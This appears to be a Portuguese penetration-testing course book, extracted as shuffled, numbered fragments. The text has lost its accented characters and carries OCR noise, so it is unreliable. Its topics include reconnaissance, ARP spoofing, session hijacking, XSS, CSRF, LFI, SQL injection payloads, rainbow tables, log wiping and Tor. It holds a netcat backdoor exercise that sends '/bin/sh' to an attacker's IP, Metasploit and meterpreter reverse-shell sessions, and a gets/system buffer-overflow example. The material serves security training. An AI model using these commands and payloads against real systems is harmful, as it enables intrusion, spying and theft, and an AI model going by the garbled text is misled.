55. p0f que permite farejarmos os pacotes que trafegam na rede E pOf i ethO o log Com o parametro i definimos em qual dispositivo de rede ele ficara farejando os pacotes se nao definimos nada ele assume all farejando todos os dispositivos disponiveis Com o par metro o dizemos para o pOf armazenar tudo o que for capturado em um arquivo de sa da com nome definido por n s 5 12 2 Fingerprint ativo O scanner envia pacotes manipulados e forjados baseado em uma tabela pr pria de fingerprint Com isso ele analisa a resposta do pacote e compara com a tabela para definir qual o sistema operacional O risco desse tipo de fingerprint que se o alvo estiver com um firewall bem configurado e um IDS IPS nosso acesso pode ser logado em seu sistema e pode ser dif cil que consigamos muitas informa es Duas ferramentas que podemos utilizar em um fingerprint ativo s o nmap e xprobe2 al m obviamente dos comandos ping e traceroute s para citarmos dois comandos b sicos Cap tulo 5 Levantamento de Informa es 68 5 12 3 Descobrindo um Sistema Operacional usando ICMP Um simples ping capaz de revelar o sistema operacional de uma m quina ping www 4linux com br c 1 PING www 4linux com br 66 118 142 41 56 84 bytes of data 64 bytes from 41 142 118 66 reverse priorityonline net 66 118 142 41 icmp seq 1 ttl 49 time 1452 ms www 4linux com br ping statisti
56. palavra que segue logo ap s o comando intitle considerada como a string de busca O comando allintitle quebra essa regra dizendo ao Google que todas as palavras que seguem devem ser encontradas no title da p gina por isso esse ltimo comando mais restritivo 4 3 2 inurl allinurl Encontra texto em uma URL Como explicado no operador intitle pode parecer uma tarefa relativamente simples utilizar o operador inurl sem dar maior aten o ao mesmo Mas devemos ter em mente que uma URL mais complicada do que um simples title e o funcionamento do operador inurl pode ser igualmente complexo Assim como o operador intitle inurl tamb m possui um operador companheiro que o allinurl que funciona de maneira id ntica e de forma restritiva exibindo resultados apenas em que todas as strings foram encontradas 4 3 3 filetype Busca por um arquivo de determinado tipo O Google pesquisa mais do que apenas p ginas web poss vel pesquisar muitos tipos diferentes de arquivos incluindo PDF Adobe Portable Document Format e Microsoft Office O operador filetype pode ajud lo na busca de tipo de arquivos espec ficos Mais especificamente podemos utilizar esse operador para pesquisas de p ginas que terminam em uma determinada extens o Cap tulo 4 Google Hacking 48 4 3 4 allintext Localiza uma string dentro do texto de uma p gina O operador allintext talvez o mais simples de usar pois realiza a fun
57. para informar que meu alvo uma m quina rodando o Windows XP E logo ap s isso vou digitar set PAYLOAD generic shell bind tcp para definir o payload que utilizarei e me retornara um shell de comando quando rodar o exploit contra o alvo Nesse ponto se digitarmos no prompt msf gt al m da explica o dos comandos b sico surgem outros comandos que precisaremos utilizar Veja abaixo Como exibido com o comando info usado anteriormente temos duas op es b sicas desse exploit que precisamos configurar para que ele possa ser utilizado S o elas Name Current Setting Required Description RHOST yes The target address RPORT 445 yes Set the SMB service port Cap tulo 19 Metasploit Framework 229 Vemos que o valor de RPORT est como 445 que ser a porta atrav s da qual ser lan ado o exploit mas podemos mudar esse valor se quisermos Digamos que atrav s de um scan anterior descobri algumas vulnerabilidades na porta 150 ent o essa mesma que vou utilizar digitando o seguinte comando no prompt msf gt set RPORT 150 Vejamos na tela abaixo como ficou ap s a execu o desse comando O valor da op o RPORT foi alterado para 150 que ser a porta utilizada para o ataque Agora vamos outra op o A op o RHOST definir o endere o que ser atacado via exploit e precisamos configur lo adequadamente atribuindo o endere o IP do alvo Digamos que quero atacar o
58. prejudicar os neg cios da empresa Cap tulo 9 Testando o sistema 112 9 7 Sequestro de Sess o A id ia por detr s do ataque de sequestro de sess o ou session hijacking justamente utilizar credenciais v lidas para acessar recursos que n o est o dispon veis publicamente Um exemplo de session hijacking conseguir acessar um servidor SSH a partir de uma sess o aberta de um usu rio v lido Outro exemplo muito utilizado pela maioria dos atacantes que quer ganhar acesso n o autorizado contas de usu rios o sequestro de sess o de aplica es WEB onde poss vel acessar o e mail orkut facebook conta banc ria e burlar qualquer outro tipo de controle de acesso de aplica es online de forma que possa acessar informa es confidenciais do alvo A ferramenta utilizada para um ataque de session hijacking de SSH o sshmitm instalado a partir da suite dsniff funciona apenas na vers o SSH1 Sintaxe sshmitm d I p porta host porta Par metros e d Enable verbose debugging output o I Monitor hijack an interactive session e p port Specify the local port to listen on e host Specify the remote host to relay connections to e port Specify the remote port to relay connections to 9 8 Pr tica dirigida com o HUNT Outra ferramenta interessante utilizada para um ataque de session hijacking o HUNT Cap tulo 9 Testando o sistema 113 Para conhecermos essa intere
59. preparados e sabem o que vai ser realizado o ideal para ser feito periodicamente monitorando as vulnerabilidades novas e mudan as feitas na infraestrutura 2 3 6 Reversal Nessa modalidade o auditor tem conhecimento total do alvo por m o alvo n o sabe que ser atacado e t o pouco sabe quais testes ser o executados Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 31 Esse formato de teste ideal para testar a capacidade de resposta e como est o timing de a o da equipe de resposta a incidentes do alvo 2 4 As fases de um ataque Um ataque ou teste de invas o composto por uma s rie de fases onde em cada uma determinadas opera es s o realizadas O que vai definir a diferen a de um teste de invas o e um ataque realizado por um cracker s o justamente a inten o o escopo e o espa o de tempo dispon vel para o mesmo As fases b sicas de um ataque s o explicadas a seguir 2 4 1 Levantamento de Informa es Essa a fase mais importante de um ataque e de um teste de invas o Baseado no que descoberto nessa fase todo o planejamento realizado e os vetores de ataque definidos Essa fase prossegue na fase seguinte onde as informa es iniciais s o extendidas de forma mais detalhada Podemos dizer que essa a fase abrangente e a fase seguinte detalha as informa es adquiridas nessa primeira fase Qualquer informa o que seja vinculado ao alvo co
60. redes TCP IP A instala o do tcpdump em sistemas Debian super simples bastando executar o comando abaixo como super usu rio root E apt get install tcpdump Exemplos x tcpdump i eth0 tcpdump i ethO src host 192 168 0 9 tcpdump i ethO dst host 192 168 0 1 tcpdump i ethO not host 192 168 0 8 tcpdump i ethO dst port 80 tcpdump i ethO src port 32881 tcpdump ni ethO src net 10 10 10 0 24 and dst host 192 168 0 1 and dst port 80 tcpdump i eth0 n s 1500 c 1000 w file cap Parametros e s qtde de bytes capturados do pacote o padr o 68 e c qtde de pacotes Cap tulo 15 T cnicas de Sniffing 185 6 w armazenar no arquivo 15 6 4 Wireshark Wireshark o bom e velho Ethereal um poderoso sniffer que permite capturar o tr fego da rede fornecendo uma ferramenta poderosa para detectar problemas e entender melhor o funcionamento de cada protocolo o Untitled Ethereal Fle Edit View Go Capture Analyze Statistics Help SHLAA Aar DFT AQA BR Bor 007842 2 gt 14729 233 405763 eN gt 885053 2 gt g 005276 3 2 gt 14770 234 277155 64 15 206 139 135 153 2 117 TCP 9000 gt 1750 AC 14795 234 745841 64 15 206 139 135 153 2 117 TCP 9000 gt 1750 PS 14852 235 250912 64 15 206 139 135 153 2 117 TCP 9000 gt 1750 PS 14870 235 477204 64 15 206 139 135 153 2 117 TCP 9000 gt 1750 P
61. rio para o servidor Como citado anteriormente o servidor n o consegue diferenciar perante esse tipo de ataque o que c digo malicioso ou usu rio ileg timo de uma requisi o leg tima vinda do usu rio v lido 13 4 6 Insecure Direct Object Reference Confiar em informa es passadas pelo usu rio e Campos hidden e Cookie admin false Esse tipo de vulnerabilidade simplesmente existe e pode ser explorada com outras t cnicas como por exemplo a CSRF Vamos imaginar como no exemplo acima que num formul rio de login h um objeto referenciado que permite a passagem de um determinado par metro para um cookie E se o atacante souber como alterar esse par metro antes de ser enviado ao servidor E se esse atacante simplesmente criar um cookie baseado em um j existente e passar esse par metro alterado gerando uma session fixated Cap tulo 13 Vulnerabilidades em aplica es web 164 Sempre que quiser acessar a aplica o como admin ter essa permiss o como se houvesse enviado uma requisi o v lida baseada em um objeto referenciado e maneira insegura Abaixo temos outro exemplo de falha com essa vulnerabilidade Permite explorar quando o desenvolvedor confia em allow url fopen gt Local File Include Possibilidades e Acessar Arquivos do Sistema Operacional e Enquadra se em Information Leak e Obter lista de usu rios etc passwd e Obter informa es do servidor Ex
62. rios Smith OR 1 1 gt Injection Flaws gt Numeric SQL Injection Cap tulo 13 Vulnerabilidades em aplica es web 173 Basta usar o Paros fazer a requisi o e inserir OR 1 1 Exemplo da chamada station 101 OR 1 1 gt Injection Flaws gt Stagel gt String SQL Injection Mais uma vez podemos resolver usando o Paros employee id 112 amp password OR 1 1 amp action Login 13 8 Contramedidas e Filtrar os dados do usuario permitindo somente o conjunto de caracteres v lidos para o tipo de dado permitido e Criptografar HASHs de senhas Utilizar SSL e HTTPS e N o criar blacklists mas sim whitelists e all input is evil Cap tulo 13 Vulnerabilidades em aplica es web 174 Cap tulo 14 Eleva o de Privil gios Locais 14 1 Objetivos e Entender a eleva o de privil gios e Procurar por poss veis alvos e Entender as possibilidades de ataques locais e Entender a eleva o de privil gios e Procurar por poss veis alvos e Entender as possibilidades de ataques locais Cap tulo 14 Eleva o de Privil gios Locais 175 14 2 O que escalada de privil gios Escala o ou eleva o de privil gios basicamente significa adicionar mais direitos ou permiss es para um usu rio Em resumo escala o de privil gios tenta transformar um usu rio normal em um usu rio administrativo usu rio com maior privil gios do que o usu rio atual ou fazer com que um usu r
63. rios sobre a mensagem e Keywords Palavras chaves relacionadas mensagem Campos de Rastreamento e Return Path Caminho de volta da mensagem para o remetente Esse campo adicionado pelo ltimo MTA que entrega o e mail ao destinat rio Received Cont m informa es para ajudar na an lise de problemas com a entrega e recebimento das mensagens Todo e mail possui pelo menos um campo Received que adicionado por cada servidor onde a mensagem passa O campo que interessa a n s o campo Received que cont m informa es sobre o endere o IP de onde a mensagem de correio eletr nico partiu Vamos ver um exemplo de cabe alho Cap tulo 5 Levantamento de Informa es 65 Teste de cabe alho de e mail Sexta feira 7 de Maio de 2010 11 56 From Luiz Vieira Fri May 7 14 56 10 2010 X Apparently To loki_br yahoo com br via 67 195 8 190 Fri 07 May 2010 07 56 36 0700 Return Path lt luizwt gmail com gt X Y MailISG D22GN8EWLDv3S52h i1n2Q_RMHotyj8fEgkpy6vkLjqgV Xe0ou9d8z3JRi HzPp9ulv8sGxKEFuZJoSGKEjcmpQKNgO2IE106u KtpgmsDoJng Yof4JakGFNaN 1rFAYx38yNwtkzVfpF2P auE DUqmqhkbpAdApCKdbiMNDQFExwnwGoVql1JMtx5SjQ0ANyS4z 3P1M 0 4 Ou2Ne7sbg130q9yPuH6b5f4GC6A2 jjOQPOF2Vg u9Ct5IGztq4lchdE wFCewHWVdxY_vmYz2Xxc Brlycrag1E081 ditMTdaF2f kKU1ORuOK Adxmly72YWXPIL84c2UXX0AKYWgZPoA6037lvV6IwkLQXT8fQ7AezVgr DHPbIQelfinVguXw mCDFsmCicAx5ph2060NUgA4qah19chxRRGbT12Q9pkk YaO3iVv2fZQuG81XedP7dzXJMOwX2GTD
64. seus pr prios scripts Para finalizar esse capitulo introdut rio que n o tem por objetivo ser exaustivo com rela o tecnologia do framework lembre se de que como todo projeto open source muito din mico e novidades s o incorporadas da noite para o dia Esperamos que todos possam aprendam muito mais sobre seguran a com o uso do Metasploit Framework 19 8 Metasploit e OSSTMM em v deo Est o dispon veis no site do FOSDEM Free and Open Source Software Development dois v deos fant sticos Simplesmente duas apresenta es sobre duas ferramentas essenciais em pentest metasploit e a metodologia OSSTM Open Source Security Testing Methodology Manual E n o uma simples apresenta o s o duas apresenta es de duas horas tendo como apresentador os pais das crian as H D Moore e Pete Herzog respectivamente Imperd vel tw Metasploit http ftp belnet be mirrors FOSDEM 2007 FOSDEM2007 Metasploit ogg OSSTMM http ftp belnet be mirrors FOSDEM 2007 FOSDEM2007 SecurityTesting ogg Veja tamb m alguns videos de utiliza o do Metasploit Framework tw http www youtube com watch v 1 bnr61Mjk0g http www youtube com watch v IVsCQyvo9MA Cap tulo 19 Metasploit Framework 222 19 9 Atualizando o Metasploit Entre no diret rio do MSF com o seguinte comando cd pentest exploits framework3 Para atualizar o MSF digite o seguinte comando b
65. tamb m conhecer os riscos inerentes e as poss veis formas de ataque De acordo com o maior estrategista que j existiu Sun Tzu se voc conhece a si mesmo e ao seu inimigo n o precisar temer o resultado de mil batalhas Afinal se conhece os estratagemas empregados por atacantes maliciosos estar muito mais capacitado para proteger seu principal ativo a informa o 1 4 Padroes Normas 1 4 1 ISO 27001 Essa norma aborda os padr es para sistemas de gest o de seguran a da informa o Substitui a norma BS 7799 2 1 4 2 ISO 27002 Baseada na norma ISO 27001 essa norma trata das boas praticas de seguranca da informacao onde indica uma s rie de possiveis controles dentro de cada contexto da rea de seguran a A partir de 2006 tornou se substituta da norma ISO 17799 2005 1 4 3 Basileia Il uma norma da rea financeira conhecida tamb m como Acordo de Capital de Basileia II Essa norma fixa se em tr s pilares e 25 princ pios b sicos sobre contabilidade e supervis o banc ria 1 4 4 PCI DSS A norma Payment Card Industry Data Security Standard uma padroniza o internacional da rea de seguran a de informa o definida pelo Payment Card Industry Security Standards Council Essa norma foi criada para auxiliar as organiza es que processam pagamentos por cart o de cr dito na preven o de fraudes atrav s de maior controle dos dados e sua exposi o Cap tulo 1 Introdu o Segu
66. um poss vel alvo O correio eletr nico dividido em duas partes Cabe alho Header e Corpo Body do e mail No cabe alho onde encontramos diversos campos com informa es de controle destinat rio remetente data de envio dentre outras informa es E no corpo da mensagem que encontramos a mensagem em si De acordo com a Rfc 2821 2822 temos os seguintes campos presentes no cabe alho de um e mail Campos de origem e From autor da mensagem e Sender remetente da mensagem e Reply to e mail sugerido pelo autor da mensagem para que as respostas sejam enviadas Campos de destino e To endere o dos receptores prim rios da mensagem e Cc Carbon Copy receber o uma c pia da mensagem com o e mail vis vel para todos e Bcc Blind Carbon Copy receber o uma c pia da mensagem sem ter o e mail vis vel para todos Campo de data de origem Cap tulo 5 Levantamento de Informa es 64 Date Hora da cria o da mensagem Campos de identifica o e Message ID Identificador de mensagem nico Valor nico determinado pelo servidor que transmite a mensagem e In Reply To Usado quando uma mensagem respondida Identificador da mensagem respondida e References Usado quando uma mensagem respondida Refer ncias Campos de informa o e Subject Assunto da mensagem e Comments Coment
67. um teste de invas o e Conhecer as metodologias e os aspectos legais Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 29 2 2 Vis o geral sobre o Pentest O Teste de Intrus o um processo de an lise detalhada do n vel de seguran a de um sistema ou rede usando a perspectiva de um infrator Trata se de um teste realista ao n vel de seguran a das infra estruturas e da informa o que estas det m No Teste de Intrus o s o testadas vulnerabilidades t cnicas e conceituais das infra estruturas alvo O objetivo principal simular de forma controlada um ataque real que normalmente executado por criminosos Desta maneira poss vel ter o conhecimento total do que poderia acontecer caso esse ataque realmente existisse garantindo assim a possibilidade de uma estrat gia de preven o 2 3 Tipos de Pentest 2 3 1 Blind Nessa modalidade o auditor n o conhece nada sobre o alvo que ir atacar por m o alvo sabe que ser atacado e o que ser feito durante o teste O grande risco desse tipo de teste que o alvo pode avisar a equipe de TI e decidirem fazer atualiza o do sistema aplicar patchs de corre o e seguran a Esse tipo de pentest interessante para ter conhecimento de como e quais informa es sobre a organiza o e sua infraestrutura poss vel de um atacante ter acesso 2 3 2 Double blind Nessa modalidade o auditor n o conhece nada sobre o alvo e o alvo n o sabe q
68. uma rota mais curta para um destino Ferramentas como o ping e o traceroute utilizam o protocolo de controle ICMP para determinar se um host est vivo na rede e para mapear os roteadores at um destino por exemplo O ping um ICMP echo request tipo 8 e o pong um ICMP echo reply tipo 0 H uma infinidade de icmp types que podem ser consultados no site da iana Sabendo dessa particularidade podemos utilizar uma ferramenta simples chamada fping que pode facilmente detectar todos os hosts ativos numa rede desde que os mesmos respondam icmp fping c1 g 192 168 200 0 24 2 gt dev null gt tmp ips txt O nmap tamb m pode ser usado com a op o sP 3 l nmap sP 192 168 200 0 24 No caso do nmap se utilizarmos a op o Ping Scan sP observamos que mesmo se uma m quina estiver bloqueando pacotes ICMP ele poder list la como ativa pois ele tamb m envia pacotes TCP para algumas portas como por exemplo a porta 80 Cap tulo 7 Varreduras ativas passivas e furtivas de rede 81 Assim conseguimos a lista de todos os computadores que respondem ping na rede 7 3 Varreduras TCP Enquanto que as varreduras ICMP nos informam a quantidade de hosts ativos em uma rede as varreduras TCP nos informam o n mero de portas abertas em um determinado computador Para descobrir se uma porta esta aberta ou fechada o programa chamado port scanner manipula uma caracter stica
69. valor a informa o fraudulenta que foi enviada para o alvo pois o alvo ver uma fonte confi vel site vulner vel A solu o para o problema simples apesar de n o ser t o simples implement la Basta substituir os caracteres lt e gt que s o recebidos pelos usu rios por amp lt e amp gt respectivamente pois o amp lt usado para imprimir o sinal de menor lt na tela que o que o usu rio est de fato enviando e n o deve ser interpretado pelo Cap tulo 13 Vulnerabilidades em aplica es web 162 navegador web do cliente Tamb m existem outras possibilidades Inserir um coment rio em um blog por exemplo utilizando as tags citadas anteriormente Caso a aplica o quando pegar esses dados da base de dados n o filtre os caracteres lt e gt antes de exibir o seu coment rio para outros usu rios ser poss vel explorar um XSS nessa aplica o afetando assim todos os usu rios de tal blog Apesar de n o ser uma falha t o cr tica j que n o executamos comandos no sistema XSS tamb m amplamente usado para Phishing na tentativa de dar mais valor a informa o fraudulenta que foi enviada para o alvo 13 4 5 CSRF e Semelhante a XSS igual Os par metros utilizados e o formato de ataque muito parecido com o XSS Inclusive o tipo de ataque CSRF surgiu a partir do XSS quando os atacantes perceberam que a partir da chamada para execu o de script com XSS seria
70. 0110 gt 0 0 0 0 51417 S 315306550 315306550 0 win 512 9 8e a6 6d 8a b4 8f bc 10 40 2 c 0 0 0 0 61280 gt 0 0 0 0 33374 S 234562279 234562279 0 win 512 8d 0 24 34 41 33 d4 4b a1 b 5 f3 0 0 0 0 6333 gt 0 0 0 0 14291 S 1505448208 1505448208 0 win 512 Outra t cnica que surgiu para sniffar redes com switchs a t cnica de ARP Poison ou ARP Spoof Quando um computador vai iniciar a comunica o com algum outro host devido ao modo de funcionamento da pilha de protocolos preciso traduzir seu endere o l gico IP no endere o f sico MAC do seu destinat rio observemos abaixo Shell1 twm arp d 192 168 2 1 ping c 1 192 168 2 1 PING 192 168 2 1 192 168 2 1 56 84 bytes of data 64 bytes from 192 168 2 1 icmp seq 1 ttl 64 time 7 36 ms 192 168 2 1 ping statistics 1 packets transmitted 1 received 0 packet loss time Oms rtt min avg max mdev 7 365 7 365 7 365 0 000 ms twm Shell2 a twm tcpdump ni eth0 host 192 168 2 1 tcpdump verbose output suppressed use v or vv for full protocol decode listening on eth0 link type EN10MB Ethernet capture size 96 bytes 01 12 09 058214 arp who has 192 168 2 1 tell 192 168 2 103 01 12 09 060366 arp reply 192 168 2 1 is at 00 18 39 8d aa 82 Cap tulo 15 T cnicas de Sniffing 181 01 12 09 060389 IP 192 168 2 103 gt 192 168 2 1 ICMP echo request id 18441 seq 1 length 64 01 12 09 062205 IP 192 168
71. 10 Trojans Backdoors V rus Rootkits e Worms 126 _ i Esses keyloggers fisicos se parecem com adaptadores de teclados PS2 USB sendo instalados entre o cabo do teclado e a entrada PS2 da CPU so que eles armazenam dentro de uma memoria flash tudo o que digitado no teclado grampeado Obviamente que a instala o de um dispositivo desses seja l gico ou f sico necessita do uso de recursos de engenharia social para que o mesmo seja instalado na m quina do alvo E no caso do keylogger f sico o atacante precisa ter acesso f sico m quina tanto para instalar quanto para pegar de volta o dispositivo 10 8 Pr tica dirigida 1 Vamos criar uma backdoor e acessar a m quina alvo atrav s dela Na m quina do atacante execute ES nc l p 4000 E Na m quina da v tima execute nc ip do atacante 4000 e bin sh 2 Copiar o pykeylogger para a m quina alvo e execut lo Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 127 10 9 Contramedidas e Monitorar constantemente os servi os executados na m quina e as portas abertas e Realizar varreduras constantes utilizando ferramentas espec ficas como o Unhide chkrootkit e o Security Auditor s Research Assistant SARA por exemplo e Evitar realizar a maioria das tarefas como root j que para a infec o e alastramento a maioria dos malwares precisam de privil gios de root Cap tulo 10 Trojans
72. 110 gt set LPORT 4444 gt exploit PAYLOAD wi er e t LHOST gt set LPORT 4444 gt exploit Started revers ler on 192 168 0 110 4444 Starting the p handler 19 12 5 PrintScreen Outro recurso interessante que o meterpreter nos oferece a possibilidade de tirarmos um printscreen da m quina alvo gt use espia meterpreter gt use espia Loading extension espia success meterpreter gt screenshot root print1 png Image saved to root printl png meterpreter gt Cap tulo 19 Metasploit Framework 237 Usamos o comando use espia para carregar o m dulo meterpreter e em seguida executamos o comando screenshot seguido pelo caminho onde ser salvo nosso screenshot com o nome de print1 png Es gt screenshot rot print1 png Para poder usar este recurso ser necess rio estar executando sob o processo explorer exe sendo assim migre para este processo caso n o esteja com o comando migrate E gt migrate pid do processo 19 12 6 Metasploit Adobe Exploit Abra um terminal e entre no diret rio do msf cd pentest exploits framework3 Mg msfconsole 524 exploits 246 auxiliary 193 payloads 23 encoders 8 nops svn r8580 updated today 2010 02 22 Cap tulo 19 Metasploit Framework 238 Vamos agora especificar o exploit que iremos utilizar d os comandos abaixo seguinte
73. 2 1 gt 192 168 2 103 ICMP echo reply id 18441 seq 1 length 64 4 packets captured 7 packets received by filter O packets dropped by kernel twm Como observamos para que o host 192 168 2 103 consiga se comunicar com o 192 168 2 1 para o envio do ICMP ECHO REQUEST ping necess rio saber o endere o MAC do destinat rio ele consegue isso enviando um pacote ao endere o de broadcast f sico FF FF FF FF FF FF perguntando quem o MAC daquele determinado IP o dono do IP responde a requisi o somente ap s isto a comunica o ocorre Ap s esta resolu o a maquina local coloca a resolu o em seu cache local que pode ser visto com o comando arp observe abaixo E twm arp an 192 168 2 101 at 00 1C 26 C8 42 1C ether on ethO 192 168 2 1 at 00 18 39 8D AA 82 ether on ethO twm Baseados nisto voc s j devem imaginar como o Windows descobre que existe conflito de IP quando iniciado Simples quando ele ligado ele envia por broadcast uma requisi o perguntando quem o MAC do IP pr prio dele se algum computador da rede responder porque o IP j est em uso 15 4 Arp Spoof Vamos evoluindo nossa explica o os ataques de arp spoof consistem em adicionar substituir na tabela arp da maquina alvo uma entrada que diz Cap tulo 15 T cnicas de Sniffing 182 IP QUE A MAQUINA ALVO ESTA SE COMUNICANDO lt gt SEU MAC Com isso quando a maquina al
74. 20 Apagando Rastros 265 a possibilidade de escrita nos mesmo nenhuma nova opera o ser armazenada e o administrador do sistema n o poder fazer a verifica o posterior para entender o que comprometeu o sistema ou a rede e Encripta o de dados gt A melhor maneira de ocultar um arquivo para que ningu m veja seu conte do ou consiga alter lo encriptando o seja atrav s de uma ferramenta espec fica de encripta o seja ocultando o arquivo dentro de outro cuja extens o e conte do sejam diversos do original Essa ltima t cnica tamb m pode ser chamada de esteganografia e Dele o segura de dados gt Essa t cnica est diretamente vinculada com a primeira de sobreescrita de dados Todo e qualquer processo de dele o de arquivos deve ser cuidadoso para que n o seja poss vel a posterior recupera o das informa es 20 5 Ferramentas e Tor The Onion Router gt e Wipe gt O Tor mant m o usu rio livre de bisbilhoteiros inclusive os do FBI e os da CIA e impede ou dificulta bastante qualquer tipo de rastreamento E exatamente isso que o Tor oferece Em vez de seguir uma rota direta entre origem e destino toda a informa o transmitida por ele segue um caminho rand mico que se altera permanentemente atrav s de diversos servidores volunt rios que cobrem a rota Fica dif cil para qualquer sistema saber quem voc onde voc est ou de onde veio embora se
75. 20 of 55 Scanned 24 of 55 Scanned 28 of 55 scanner smb smb vers hosts 01 hosts 02 hosts 03 hosts 043 complete hosts 050 complete TIMEOUT 1000 VERBOSE o MDDINCIETENTA ue L Show advanced options Launch 192 168 1 250 445 is running Unix Samba 3 5 4 language Unknown domain WORKGROUP Scanned 33 of 55 hosts 060 complete Scanned 39 of 55 hosts 070 complete Scanned 44 of 55 hosts 080 complete Scanned 50 of 55 hosts 090 complete Scanned 55 of 55 hosts 100 complete Auxiliary module execution completed msf auxiliary smb version abrir exibindo todos os servi os que foram varridos no sistema alvo ay Console X scanner smb smb version X scanner portscan tcp X Services X host 192 168 1 204 192 168 1 204 192 168 1 204 192 168 1 204 192 168 1 204 Mesmo com essas simples varreduras podemos ver que conseguimos muitas informa es sobre nossos alvos que s o apresentadas para n s em uma interface bem amig vel Adicionalmente todas as informa es s o armazenadas em nosso name smb banco de dados MySQL port proto state info 21 tcp closed 23 tcp closed 25 tcp closed 80 tcp open 443 tcp closed 445 tcp open Windows 2003 R2 Service Pack 1 language Unk mysql gt use msf3 Reading table information for completion of table and column names You can turn off this feature to get a quicker start
76. 25 2008 Jul 22 2002 Feb 16 2003 Mar 21 2004 Jun 06 2007 Feb 10 2008 Jul 23 2002 Mar 27 2003 Apr 04 2004 Jun 07 2007 Feb 26 2008 Aug 06 2002 Apr 20 2003 May 13 2004 Jul 10 2007 Mar 25 2008 Sep 16 2002 Apr 25 2003 Jun 04 2004 Jul 15 2007 Apr 10 2008 Sep 24 2002 jun 12 2003 Jun 14 2004 Aug 22 2007 Sep 25 2002 Jul 17 2003 W015 2004 Sep 24 2007 Sep 26 2002 Oct 11 2003 JUN 19 2004 Sep 27 2007 Oct 12 2002 Oct 22 2003 Sep 29 2007 N Nov 24 2002 Oct 30 2003 Oct 02 2007 Dec 01 2002 Dec 19 2003 Oct 04 2007 Dec 20 2003 Oct 05 2007 Dec 24 2003 Oct 07 2007 Oct 08 2007 Oct 11 2007 Nov 03 2007 Cap tulo 5 Levantamento de Informa es 60 5 7 Webspiders Webspiders s o programas que navegam automaticamente por websites para coletar informa es Pensando no Google um webspider feito pelo Google navega pelos links das p ginas e alimenta uma base de dados do Google que usada para consultas durante as buscas realizadas pelos usu rios Vamos parar e lembrar como funcionavam antigamente os sistemas de buscas como Yahoo Cade Aonde com dentre outros Antigamente n s precis vamos cadastrar os nossos sites e as palavras chave referentes ao site para ele ser encontrado durante as buscas Por m o Google inovou na maneira de alimentar as bases de dados dele usando webspider Hoje basta que um site esteja na internet e linkado para que ele apare
77. 4CCD37187C81 r o55F350 FCCCS35BE2CE6923E2CE6923811CIDCSE2CE69272576B7696ED3C295FACD41D3 6ED3C295E1CE67B124200B4CE2CE6923E2CE69236ED3C2956ED3C295E2CE6923 E2CE6923FCCCS35FA732F670E2CE6927E2CE6920 Microsoft IIS 6 0 137 82 53 Microsoft 115 5 0 ASP NET 81 12 34 Microsoft IIS 5 1 81 12 34 Apache 1 3 26 81 12 34 zj C Z pentest enumeration www shttprint win32httprintoutput html E isi di gt E Clear All Options httprint has been completed Por File A partir da imagem acima usando um site qualquer como exemplo descobrimos que com 82 53 de certeza o servidor sendo executado o Microsoft IIS 6 0 e o site foi construindo usando ASP ou ASP NET As demais possibilidades de servidor sendo executados s o mostrados na parte inferior esquerda da tela e Microsoft IIS 5 0 com 12 34 e Microsoft IIS 5 1 com 12 34 e Apache 1 3 26 com 12 34 Cap tulo 16 Ataques a Servidores WEB 193 16 4 Descobrindo Vulnerabilidades com Nikto Nikto um script Perl usado para testar a seguran a de seu servidor web Ele faz a varredura em servidores Apache tanto em busca de vulnerabilidades quanto de falhas de configura o que podem de alguma forma expor o servidor explora o por algum atacante malicioso j que se o servidor estiver hospedando algum site ou aplica o de acesso p blico o risco de explora o imenso Para atualizar e executar o Nikto utilizamos os seguintes comandos
78. 554432 key space 3671 3672 3673 3674 3675 3676 3677 80603140212 Key space o n mero de poss veis strings em texto plano para o charset plaintext len min e plaintext len max selecionados table size 3 GB success rate 0 999 O algoritmo de time memory tradeoff um algoritmos probabilistico Qualquer que seja os parametros selecionados ha sempre probabilidade de que as strings dentro do charset selecionado e o tamanho das strings nao seja completamente coberto A taxa de sucesso de 99 9 com os parametros usados nesse evento comandos para gerar as tabelas Os comandos do rtgen usados para gerar as rainbow tables sao rtgen md5 loweralpha numeric 1 7 0 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 1 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 2 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 3 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 4 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 5 3800 33554432 0 Se precisar criar uma tabela de hashes ntlm ou Im substitua o md5 nos comandos acima por ntlm ou Im Se precisar de uma tabela com o charset alpha numeric substitua o loweralpha numeric nos Cap tulo 12 T cnicas de For a Bruta 150 comandos acima por alpha numeric Se uma tabela com hashes Im for criada tenha certeza de que seu charset seja alpha numeric ao inv s de loweralpha numeric O algoritmo Im nunca utiliza caracteres min sculos como string
79. Address of command is d n dangerous system command sprintf dangerous system command echo s Hello world printf What s your name gets name system dangerous system command Salve o arquivo como overrun c depois compile e execute o com os seguintes comandos 3 gCC overrun c o over over Cap tulo 18 Exploits 212 Para test lo digite o seguinte no prompt exibido pelo programa El 0123456789123456ls E veja o que acontece O que causa essa falha o fato de que a vari vel name ocupa apenas um determinado espa o que pequeno na mem ria Quando estouramos esse espa o e conseguimos sobrescrever a pilha EIP da mem ria inserindo um comando que queiramos que seja executado o resultado final a execu o do mesmo 18 6 Conclus o e Com isso conseguimos demonstrar o perigo que uma falha de programa o em um programa e poss vel obter controle completamente sobre o programa que esta sendo explorado e Se o programa oferecer algum servi o remotamente a falha pode ser explorada remotamente da mesma forma que foi explorada localmente apenas trocando o shellcode e criando os sockets que ser o respons veis para se conectar no programa Cap tulo 16 Ataques a Servidores WEB 197 Cap tulo 17 Ataques a Redes Sem Fio 17 1 Objetivos e Entender as t cnicas para acessar as redes sem fio e Uma vis o sobre WEP
